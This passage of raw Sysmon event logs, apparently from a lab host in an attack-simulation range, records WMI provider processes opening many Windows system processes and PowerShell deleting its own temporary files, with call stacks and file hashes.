4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lz3ec4q0.epp.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D98-603E-97AA-00000000AD01}13564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0e35fkqe.cmt.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPC